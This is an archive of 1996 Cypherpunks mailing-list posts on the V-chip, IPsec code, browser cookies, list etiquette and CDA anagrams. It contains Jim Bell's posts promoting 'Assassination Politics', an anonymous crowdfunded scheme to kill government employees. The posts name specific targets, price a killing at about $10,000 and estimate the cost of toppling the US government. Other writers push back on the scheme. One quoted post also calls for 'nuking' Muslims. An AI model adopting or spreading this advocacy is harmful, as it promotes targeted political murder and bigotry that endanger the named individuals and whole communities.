> >>And besides... why rate program just on violence?  Why not "quality" from 
> >>a variety of orgs?  Other content ratings, from various organizations.  
> >
> >...
> >
> >One thing the V-Chip gives us is the argument:  Now that parents have the
> >ability to control what their children watch, the government should turn
> >responsibility over to them and butt out.
> 
> Parents had that ability before.  Cable boxes have a "perental control key"
> on the side that enables them to lock out "offensive" channels.  It works
> quite well and is fairly hard for the kidlets to defeat.  (I used it to
> lockout the religious stations and home shopping channels.)
> 
> The "V-Chip" debate is a mirror of the one that occured when the cable
> channels were starting to become popular.  There was a big hue and cry about
> kids getting to the "naughty" channels without parent concent.  Seems most
> people do not even learn how the lockouts work.  (And are too lazy to learn.)
> 
> You have to remember that most of the people arguing for TV filters are
> looking for a way to make the "offensive" stuff go away for good.  (Either
> from some sort of rating system or a heavy handed FCC regulation or two.)
> And don't believe that the V-Chip will let you choose the rating service.
> It will be one centrally produced rating from some faceless and nameless
> entity.  I am willing to bet that we will see some pretty absurd examples of
> ratings (mild things getting heavy ratings above and beyond the call of
> sanity) in the future.
> 
> The v-chip will be less than useful as a real filter tool for those of us
> who have a different worldview than the censors.
> 
> Remember: "Future events like these will happen to you in the future!"
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                 http://www.teleport.com/~alano/ 
>   "We had to destroy the Internet in order to save it." - Sen. Exon
> "I, Caligula Clinton... In the name of the Senate and the people of Rome!"
>    - Bill Clinton signing the CDA with the First Amendment bent over.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 22:07:40 +0800
Subject: No Subject
Message-ID: <QQacwt11685.199602141352@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



I've just mailed off to Sameer Parekh the January '96 release of the
NRL IPv6 sources.  For those not in the know, this code implements the
IPsec protocol for both IPv4 and IPv6. IPsec is a cryptographic
protocol for securing IP datagrams -- it is now an IETF Proposed
Standard, defined in RFCs 1825-1829.

The code probably could use some work, but its not bad and a
reasonable start for all sorts of work.  This is a new version that
reportedly has lots of bug fixes -- I'm also given the impression it
may be the last NRL release of this code because the people doing the
work have left there -- if it gets adopted by the BSD community, it
will probably end up integrated into future NetBSD, BSDI and FreeBSDs,
which would be where to look for future releases.

The code should drop into BSDI almost out of the box -- it requires
more work for NetBSD and FreeBSD.


Perry

PS Sorry to interrupt the discussion of the sex life of the Aloe Vera
plant with something as irrelevant as cryptography. I can't resist
sometimes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 22:38:50 +0800
Subject: No Subject
Message-ID: <QQacwv16310.199602141417@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


http://www.microsoft.com/intdev/inttech/cryptapi.htm    

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warmish here.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 22:57:19 +0800
Subject: No Subject
Message-ID: <QQacww20103.199602141434@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I got a mouse pad in the mail today, mailed in
Maryland, but otherwise in a plain brown envelope.
It has nice, understated gold seal announcing it
is from the National Security Agency's Information
Systems Security Organization.

Obviously it wasn't export controlled.

I met these people at the recent USENIX
conference; there was an Air Force related trade
show in the center next door to the San Diego
Marriott. I was looking for people to submit
papers to the upcoming USENIX Unix and Network
Security Conference in San Jose in July. The
deadline for extended abstracts is one month away
(hint, hint).

Greg.

-- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 22:53:13 +0800
Subject: No Subject
Message-ID: <QQacww20750.199602141437@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:55 AM 2/13/96 -0800, Bill Frantz wrote:

>>You mention the issue of Rushdie, as if it is some sort of refutation of my 
>>idea.   Quite the contrary; I think it actually supports me.
>>
>>How so?, you ask?  Well, let's consider any potential assassin who might be 
>>interested in this "contract."  Aside from the obvious moral issues involved 
>>here (Rushdie has, presumably, done nothing to warrant his death), the truth 
>>is that such a potential assassin would see a number of problems that would 
>>strongly dissuade him from attempting to kill Rushdie.
>>
>>1.  There is no way he could be assured that he could collect the award 
>>anonymously.  His name would certainly "get out," and then he would be 
>>subject not merely to "the law," but also anybody who wanted revenge for 
>>Rushdie's death.
>>
>>2.   There is no way he could be assured that he would actually receive the 
>>award.  (How would he prove HE did it?)
>>
>>3.  That's because there is no way he would enforce this "contract" should 
>>the offerer refuse to pay.
>
>These points would not affect a devout Iranian Muslem.  To him the death
>warent has already been issued by legitimate authority.  It is not even
>clear that money would be his princple motivator.

Which simply proves my point;  money is not the limiting factor, here.

>I must respectifully disagree with Jim in this case.  I believe that
>Rushdie has not been hit because the protection he enjoys is sufficent to
>repel the potential assassins.  Note that he has an advantage over the US
>president (who probably has as many potential assassins) in that he does
>not need to make public appearences.

But remember, Rushdie is merely ONE PERSON.  And keeping him safe has 
consumed a lot of resources.  You don't think the government could protect 
each of their most publically hated employees to a similar level if a reward 
of, say, $20,000 were put on each of their heads.  How much could we collect 
to "get" Lon Horiuchi, for example?  Or the hundred or so agents immediately 
participating in the initial Waco incident, or the dozen or so decision 
makers immediately above them?   Etc.

The Rushdie incident is simply so far removed from "Assassination Politics" 
that it can't possibly be used to refute it; I still believe it actually 
demonstrates how much effort somebody has to go to, to protect a targeted 
person.  One targeted person is easy to protect.  10,000 would be FAR 
harder.  And the moment a few of those guys got "whacked," the rest would 
want to resign their jobs and hope they would be allowed to retire in peace.


>Adding money to the pot will attract rational (and amoral) people who will
>then make a determination based on (1) profit, and (2) risk, which includes
>getting caught or killed.  It seems to me that Secret Service levels of
>protection can protect a public figure against even Assassination Politics.

In a sense, qualitatively you absolutely correct, but (quantitatively) 
you're wrong.  

I think the problem is that when most people hear the term "Assassination", 
they think of only the highest-level targets.  Quite the contrary; I think 
this system will get the medium and even the lower-level people FIRST, 
de-populating the government primarily by hurried resignations of worried 
people.  The remaining  people would be terrified to actually make anybody 
angry, and they wouldn't have a paycheck because they couldn't collect any 
taxes.  The whole system would collapse in a heap.

Jim Bell

Klaatu Burada Nikto

Something is going to happen.   Something...Wonderful!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSDmO/qHVDBboB2dAQFeOgP/bpXFbTfw1R/iTRsWOrEZJI22N4nFPWX3
XBN2dx106jTdx/eoYz1rhjiaeZt/FzB83DABj34HuVPkws1OPEQ2e6Dneva5RjHK
QJFN4Po9SN03fb+7l3yp5Axr/1P4j4eiao4t0oAF+NPNk2FzU2LvHEMpbIawme0B
AC6Uv4nR8hc=
=9lr1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 23:21:01 +0800
Subject: No Subject
Message-ID: <QQacwx24457.199602141455@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


"Declan B. McCullagh" <declan+@CMU.EDU> said:

DBM> ObCrypto: Yes, Know Your Enemies and work with the natural
DBM> enemies of the religious right, such as groups like the ACLU and
DBM> the FEN. The theocratic push to outlaw nonescrowed crypto is
DBM> next.

	As someone who would prolly be considered part of the
'religious right' (why don't we ever hear of the 'religious left', who
are prolly just as much in support of banning porn?), I have to take
exception to this.  I'm appalled by the CDA, and, if you start
pointing out to religious supporters of the CDA that it has already
resulted in the King James version of the Bible being removed from (at
least) one web site, I'm sure that some of them will be as well,
especially the fundamentalists for whom the spread of the Gospel is,
well, gospel.  Be sure to point out that the same courts who the blame
for 'removing prayer from our schools' would be ruling on the indency
of the Bible.  As for supporting GAK/banning non-GAK, I don't think
that you would dispute that the 700 Club is strongly dominated by the
religious right, and it came out firmly AGAINST the entire notion of
GAK during the Clipper debate.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Thu, 15 Feb 1996 02:40:04 +0800
To: perry@piermont.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <v01530500ad4533f2a44b@[204.179.169.57]>
MIME-Version: 1.0
Content-Type: text/plain


}jim bell writes:
}> If Perry is REALLY sincere about objecting to the NON-crypto part of AsPol,
}> he should demonstrate this by writing notes which are focussing on the
}> crypto aspects, rather than just complaining.
}
}Frankly, Jim, the only reason I haven't torn apart all the utterly
}ennervated simulacra of arguments you have posted to support your
}"concepts" is that they are *all* off topic and I do not participated
}in the discussion of off topic postings.

Frankly perry, you're a fucking child and I can't remember reading anything
intelegent from you in this list at all.  Jim Bell at least contributes
ideas.  You generate garbage.  I'm a patient man, but you've finally done
it.

PLONK!

Jeff

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 15 Feb 1996 02:45:58 +0800
To: tallpaul@pipeline.com
Subject: Re: Strange Sounds of Silence
Message-ID: <01I14KX2XSX4A0UZOC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tallpaul@pipeline.com" 12-FEB-1996 00:47:35.36

>But I do not dismiss people as "lib'bers;" I merely call them that. I have
>noticed that a large number of libertarians are fans of Rush Limbaugh and
>chuckle a lot when Rush refers to women like Andrea Dworkin and her
>supporters as lib'bers. I also find that the people opposed to Drowkin &
>Co. are upset at her use of demagogic language, private dictionaries, and
>the like. So am I, and started long before Rush got his TV shows. I am,
>however, equally (if not more upset) by what I perceive as similar
>demagogic etc. behavior by many libertarians. 

	Large number of libertarians are fans of Rush Limbaugh? The last time
I checked, Rush Limbaugh was basically a conservative populist like Pat
Buchanan. While we may appreciate his comments re Andrea Dworkin (and others
who want to restrict free speech on ridiculous grounds, and who believe
nonsensical things like an inability to consent to sex), that doesn't mean
we're fans of his. I like some of what Jefferson said, too, but that doesn't
mean I agree with him on slave-holding (or on agrarianism).

>Do they really have a right not to be styled "lib'bers?" No, I do not think
>they have that right. 

	Call us whatever you like. My problem with the term is that it's
confusing. I doubt, for instance, that Rush Limbaugh is using it as an
abbreviation for libertarian, although I'm not sure for what, if anything,
it's a contraction.

>I do not believe that all lib'bers are in league with the Christian right;
>I am distrubed, however, by the large numbers of lib'bers who strangely
>never mention the existence of the fundamentalists in the
>ultra-conservative ultra-private-property camp. 

	Yes, the fundys are in there. Politics makes strange bedfellows; work
with whoever you can on whatever you can agree on. It's sort of like both our
and CPSR's opposition to the CDA - CPSR has entirely too many desires to
regulate private property (free net access et al), but we can still work with
them on what we agree on.

>I am equally concerned with some leftists who consider every example of
>authoritarian behavior as "fascism" as I am with 'ib'bers who lump everyone
>who argues for social responsibility as a "socialst statist." One
>difference I see is that I am willing to criticize both groups while many
>(but not all) lib'bers are again strangely silent at least the "statist"
>side of the equation. 
 
	Well, about 25% or so of libertarians are anarcho-capitalists, so far
as I can tell. So of course they're going to find anyone who's advocating state
control a "statist." They've agreed to disagree with people like me who aren't
anarchists, but that's because we've got most other things in common.  
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 15 Feb 1996 09:34:30 +0800
To: perry@piermont.com
Subject: Re: LI Newsday OpEd: Criminal Justice System
Message-ID: <199602121826.NAA02153@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> I personally find stuff like this interesting, but I prefer read about
> it in places like libernet or the like. Cypherpunks is for
> cryptography.

I thought it was somewhat related in terms of The Law (tm), but 
you're point is taken. (Hey, at least I posted highlights rather than 
the whole article).

Rob.
 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 15 Feb 1996 09:33:38 +0800
To: cypherpunks@toad.com
Subject: Re: Assasination Politics
Message-ID: <01I14MB2RNWWA0UZOC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I have changed the subject header (despite its destroying threading
with the way my mailreader works) so that Perry et al can more easily filter
this out. I have concluded that Assasination Politics, since it is a possible
development of true anonymnity, etcetera, is a proper discussion topic for
cypherpunks - while not cryptography in and of itself, it is a possible result
of cryptography.

From:	IN%"frantz@netcom.com" 12-FEB-1996 03:24:07.29

>Again, absolutely.  Hell, I can't even devise a filter that will let me
>filter out Jim Bell's rants while letting me see his reasoned arguments on
>anonymous assassination.  (I would love to have him address the Salman
>Rushdie issue, a man who is still alive despite a considerable announced
>price for his head.  There appear to be limits to who can be subject to
>assassination for pay.)

	Actually, that's an argument for non-misusage of Assasination Politics.
If the person hides, there's not much one can do about it. But a hiding
law enforcement agent can't be out violating people's rights. (I will mention
that whether a right is violated or not is essentially a matter of the
perceiver - under any system, whether governmental or not. All ethical
arguments assume either some degree of common ground that can be argued from,
or the finding of logical inconsistency). Those who do so via the net can be
taken care of via the other mechanisms discussed here. It's just that the
physical part is a possible net weakness.
	Moreover, just because _some_ rights-violaters (not that Rushdie was
one) aren't killed doesn't mean that all of them wouldn't be. A system doesn't
have to be 100% efficient to be effective.
	However, the Rushdie case does bring up one problem I have with
Assasination Politics as currently constructed. While people are unlikely to
patronize a general/non-discriminatory organization, a more particular but
non-libertarian one is still possible. For instance, if the Christian
Coalition put together an organization, anonymously, what would prevent them
from offing everyone who was a major leader against them - such as a doctor
researching new abortion techniques, or a geneticist (such as myself) doing
gene therapy work they found offensive? The patrons would know that _they_
wouldn't be targeted after all... I would appreciate a response from Jim Bell
on this subject.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@hooked.net>
Date: Sat, 17 Feb 1996 18:05:34 +0800
To: "jya@pipeline.com>
Subject: RE: COO_kie
Message-ID: <01BAF957.48ABCE80@chum-3.ppp.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain



So, Folks, how does one manipulate the cookie in Netscape so that the user can control what Netscape sees???

Michael E. Carboy
carboy@hooked.net


   2-12-96. FinTim:

   "This bug in your PC is a smart cookie."

      Netscape Navigator contains a little-known wrinkle that
      increases the power of companies to find out who their
      customers are and what they are up to. It allows
      companies to track which Web pages an individual looks
      at, when, for how long, and in what order. The
      information is stored on the customer's computer as
      "persistent client-state hypertext transfer protocol
      cookies".

   2-12-96. WSJ:

   "Consumer Privacy on Internet Goes Public."

      The advertising industry's response to the volatile
      issue of consumer privacy is drawing howls of protest
      from consumer advocates. The battle is over what should
      marketers be allowed to do with personal information
      they gather from consumers visiting Web sites. Marketers
      "want to have dossiers on people with incredible detail
      so they can pick and choose what they send to you."

   "Invention Machine's Software Wins Orders for Picking
   Brains of Inventors."

      A software program is being snapped up by a growing
      number of America's biggest companies to provide
      inventing partners for their engineers. The program
      codifies the invention principles behind some two
      million international patents and the inventive
      techniques of some of the world's greatest inventors.
      Mr. Tsourikov said the product grew out of his early
      studies under Genrich Altshuller, who posited that
      invention isn't a random process but has a certain
      algorithm which drives it.


   COO_kie













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: willer@carolian.com (Steve Willer)
Date: Thu, 15 Feb 1996 10:09:30 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: Free end-to-end encryption code?
In-Reply-To: <Pine.3.89.9602120956.C6693-0100000@dal1820.computek.net>
Message-ID: <311f61c8.2606869@saturn>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996 09:46:29 +0000, you wrote:

>On Mon, 12 Feb 1996, Steve Willer wrote:
>
>> As a side project, to support remote mail and news pickup through the
>> Internet to my company's servers (through a firewall), I've been
>> slowly writing an end-to-end encryption program. Essentially, the idea
>
>Why reinvent the wheel?  Lots of end-to-end stuff out there - I use ssh, 
>myself...

Okay...well...here's another problem. You see, most of the clients are
going to be Windows people. I can't use a Unix-only solution.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Fri, 16 Feb 1996 12:43:01 +0800
To: cypherpunks@toad.com
Subject: META: Filtering/Posting advice
Message-ID: <199602122243.RAA22214@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"I have a concern..."

Cypherunks 
First: Stipulated that any traffic has a 'right' to be on cypherpunks.
However, cypherpunks is what we make it.  Every time you post a message,
consider the desirability of seeing a hundred or so messages just
like it from every other readers' point of view.  Content control begins at home.

Second: I'll remind the reader that one can easily evaluate an
individual's past contributions to cypherpunks by looking at the archives'
"by author" listing.  If you post to cypherpunks, I'd suggest that you
go back and look at what you've posted in the past to get a feel for
how other people on the list see you.

Third: Filtering isn't just a game for the vocal: as noise begets noise, I'd
encourage everybody to filter out people whose prose they simply
can not stand.  While this is an important aspect to creating a more
readable list, I can't imagine anybody really caring who else has been
"plonked": to me, in seems no more than a preadolescent "nyah nyah, I'm
not listening..."

I'm half- (only half-, as I'm a free-speech absolutist) tempted to write a tool
that would automatically remove any person from cypherpunks who posts a
"plonk" message.  Until the total lack of security in majordomo is addressed,
this is a game that anybody who can telnet to an smtp port can play.

Fourth: Cypherpunks is fast becoming a ghetto.  My first reaction (which I
did not follow) to several crypto posts in the last few days has been to refer
the posters to coderpunks.  While there is some signal that will always
remain uniquely suited to cypherpunks (Tim May's contributions, Strata's
response to JPB, and Jim Bell's Assassination idea -- though not all of the
messages he's sent since -- immediately come to mind), any signal
that has another place to migrate will do so if the noise issue isn't addressed
better.  

Words of wisdom from the past:

 This program posts news to thousands of machines throughout the entire
 civilized world.  Your message will cost the net hundreds if not thousands of
 dollars to send everywhere.  Please be sure you know what you are doing.

 Are you absolutely sure that you want to do this? [ny]

IE, please... if you aren't adding *new* *signal* to the list, please
refrain from posting.  If you must flame a person, do it in private email.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR/CnioZzwIn1bdtAQEG6gGAsw6qzFNpiRLGRW0n7qdHDIJ+Yf+XmBIC
dnntiQ+UbXODeNLwsp4jVPSFVETAkCJj
=GAYX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@WELL.COM>
Date: Thu, 15 Feb 1996 21:56:28 +0800
To: Multiple recipients of list LUDHUM-L <LUDHUM-L@CCVM.SUNYSB.EDU>
Subject: Safdar and Seiger at EF Forum
Message-ID: <199602131759.MAA21450@abel.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text


Thursday, February 15, Electronic Frontiers Forum
http://www.hotwired.com/club or telnet://chat.wired.com:2428
7PM PST   8PM MST   9PM CST   10PM EST

Jonah Seiger and Shabbir Safdar

     Jonah Seiger is policy analyst/online presence for the Center for
     Democracy and Technology (CDT), and Shabbir Safdar is the driving
     force behind Voters Telecommunication Watch (VTW). Both have worked
     to track the evolution of the just-passed telecommunications reform
     bill and other legislation that would negatively impact the
     existence of a free and open Internet. Join us in Electronic
     Frontiers with host Jon Lebkowsky on Thursday, 15 February at 7 p.m.
     PST (Friday, 03:00 GMT).

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jon Lebkowsky <jonl@well.com>                      http://www.well.com/~jonl
Electronic Frontiers Forum, 7PM PST Thursdays <http://www.hotwired.com/club>
Vice President, EFF-Austin                     <http://www.io.com/~efaustin>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Thu, 15 Feb 1996 14:28:02 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <ad4541d1000210045325@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960213102825.10848A-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Timothy C. May wrote:

> At 10:07 PM 2/12/96, Steven C. Perkins wrote:
> Once again, the gutter religion of Islam reveals the derangement of its
> so-called Prophet.
> 
> The world really needs to get around to nuking these folks.
> 
Oh, Come now!  Islam may in its present form be a religion deeply hostile 
to liberty.  But since "nuking" the whole Islamic world would not be 
itself much of a defence of freedom, the only long term answer is to 
promote within Islam the same kind of Reformation as eventually made 
Christianity half decent.  And Tim's comments do not contribute to that.  
I don't know how many internet servers there are in the Middle East.  
But, if I were an intelligent fundamentalist, I'd be copying it all over 
the place.  "Look", I'd be saying, "these people really do mean another 
crusade to destroy us and our faith".

I can understand Tim's disgust with these people.  But I do question his 
manner of expressing it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 15 Feb 1996 01:19:30 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Assasination Politics
Message-ID: <m0tmQEr-00091jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:03 PM 2/12/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"jimbell@pacifier.com"  "jim bell" 12-FEB-1996 04:18:43.34
>
>>>How much weight is Lotus going to give the opinions of a bunch of
>>>unbalanced sociopaths when they're thinking about making deal to gak those
>>>extra 24 bits?  Not much, I'll bet. 
>
>>If "AsPol" actually WORKS, Lotus won't have to "deal" to get "those extra 24 
>>bits."
>
>>Lotus should announce that they have heard of this new idea on CP, called 
>>"Assassination Politics," and have assigned a couple dozen programmers to 
>>implement it by July 1996.  They'd back (guarantee) the prizes for the first 
>>such organization, and they'd sell the software to others.  At that point, I 
>>think the resignations from government office would skyrocket.  
>
>	It seems likely that any overt organization operating an Assasination
>Politics scheme will be outlawed... even though the most logical reading of
>current laws says that it isn't illegal (except for the gambling part). An
>anonymously constructed one seems a lot more likely - which Lotus could then
>anonymously patronize.

Even if operation of such a system is "outlawed," the government would still 
have to TRY to enforce the law, which would be mighty difficult.  Remember, 
the whole system is based on anonymity, which means it'd be hard to get 
witnesses to any overt act.  And we have 1st amendment issues to consider:  
If this system were operated from overseas, it would be difficult or 
impossible to restrict communication with the main organization, etc.

I believe that the enthusiastic support by some well-known software company 
(even if they didn't intend to actually run or assist in the running of the 
operation itself) would make the politicians shit bricks, leading to a 
cathartic national debate that we sorely need.

> I do have some ideas for making such possible, but I'm
>waiting on a defense of three points before I'll release them. These points
>are:
>
>	A. My previously mentioned problem with a limited but non-libertarian
>organization.

I don't deny that such an organization might spring up.  (Anti-abortion 
activists are the group which come most immediately to my mind, BTW.  I'm 
not in sympathy with them; quite the opposite.)  I've never claimed that 
this system is totally immune to such abuse, in the same way that the seller 
of a gun can certify that it will never be used to commit a crime.


>	B. I don't trust the average person to look ahead enough to make this
>(or other Anarcho-Capitalist) schemes work.

Fortunately, "Assassination Politics" will achieve this "crypto anarchy" 
even if only a tiny fraction of the population participate and use it.  The 
reason is that the number of decision-maker government employees is 
comparatively small and most will resign before being "terminated." (with 
extreme prejudice.)  The total cost to bring down the US government will 
probably be substantially less than $100 million.


> In other words, the average person
>has to be able to see that a non-limited organization is a danger to them,
>etcetera.

I realize that this takes a bit of thinking to recognize.  I've thought 
about this whole thing for nearly a year, now, and it is still a fascinating 
and yet a bit terrifying subject.


> Moreover, Jim Bell is ignoring the other sources of propaganda than
>government in convincing the average person that someone is doing something
>wrong (when, by my ethics at least, they aren't) - such as religion and
>various organizations like the PFDA.

Again, only a tiny fraction of the population needs to participate...


> Admittedly, as I've stated before, the
>requirement for some money would help, at least to the degree that our economy
>is meritocratic. (A growing tendency, fortunately.) If most people are on a
>subsistence wage (the result of free trade & automation with varying human
>abilities), they can't afford enough money for Assasination Politics. (Yes,
>I'm an intellectual Elitist. Deal with it.)

I've been asked what I think would be the average payoff for a medium-level 
government official "kill" would be.  Naturally, that would be 
market-driven, but it is reasonable to assume that most of the payment for a 
CURRENT contract killing is based on the risk; not merely the risk of doing 
the job and/or getting caught, but also the risk of dealing with (and 
trusting, etc) the other guy.  I suspect that the vast majority of 
convictions for contract killings occur not because the killer was caught in 
the act, but because of these relationships associated with it.

Since "Assassination Politics" promises essentially perfect anonymity to the 
donors as well as the "predictors", the majority of the "risk" associated 
with having such a job done would be far lower than currently.  I estimate, 
therefore, that you could get "action" for around $10,000.

Since "Assassination Politics" is based on a combined-donation system, even 
people on a subsistence wage could contribute; a quarter here, a dollar 
there, pretty soon it turns into real money.


>	C. While I may not like dealing with the average person very much (see
>above), I don't want to see them starving in the streets. I can see
>governmental welfare as being necessary for this, although the private form
>is definitely preferable. (And yes, I can justify this as being a 
libertarian -
>if not Libertarian Party - viewpoint. If I recall correctly, I had a debate
>with Perry on this on Libernet, in which he tried to dismiss me as "just a
>Democrat." I was posting under the name ALLENS@YANG.EARLHAM.EDU at the time).
>	-Allen

I understand your concern.  I wish there was some simple argument I could 
give which would assuage your fears.  However, I look at it this way:  The 
Federal government (and all other governments, around the world) are 
curently parasites on the rest of the population.  Now "parasite theory" is 
that the parasite has some sort of optimum "parasite level" above which he 
cannot go.   Once the cost for such parasitism is removed, there will be an 
economic boom for those "hosts" of the parasite.  Naturally, the parasite 
will be in trouble, but that's only justice.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSDdJfqHVDBboB2dAQEvrAP8DBlD+6eDoUGNBHo+VjfjWHoCv17zuxaE
ZpRek0qYw1hyLH/BtDbhdF9WWX+epcxN2FHEMgC/LOlndUmyx2GsVX2usfetT7bd
CBDG99nOg7aU1ZPavmEJDsp9rd2kycdjDA2WkLWLj4FeiwT3kiT2Yieh1aVweXff
U3VB1cYCefc=
=3LY3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Thu, 15 Feb 1996 14:30:46 +0800
To: rishab@shellx.best.com (Rishab Aiyer Ghosh)
Subject: Top 10 anagrams - "Communications Decency Act"
Message-ID: <199602132011.MAA23703@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Terribly sorry, I've a mail backlog a mile long, haven't
seen this yet, etc etc. Besides, it's so short, and so brilliant,
that it deserves being posted more than once.

-Rishab

---begin forwarded text---

From: Mike Morton <mike@morton.com>
Date: Sun, 11 Feb 96 20:25:35 -1000
Subject: Top Ten Anagrams -- 'Communications Decency Act'


Copyright (c) 1996 by the author, Mike Morton <mike@morton.com>. All
rights reserved. You may reproduce this, in whole or in part, in any
form provided you retain this paragraph unchanged.

Top Ten Anagrams for "Communications Decency Act"

 10. Caution cynic: Scan modem, etc.
  9. Communist, candy, cocaine, etc.
  8. Academic custom: Cynic on 'Net
  7. Connect CIA, communist decay
  6. I disconnect my Acme account
  5. [This anagram too offensive to post]
  4. Condoms, etc., can cue intimacy
  3. Decency? Commit a sin, account!
  2. Cut my academic connections
And the number one anagram for "Communications Decency Act":
  1. Comic scene: Nudity act on Mac

Runners-up:

     A succinct edict: man, economy
     CIA? Disconnect me, my account?
     Connect Mosaic; induce my act
     Cute, cosmetic cynic: Madonna
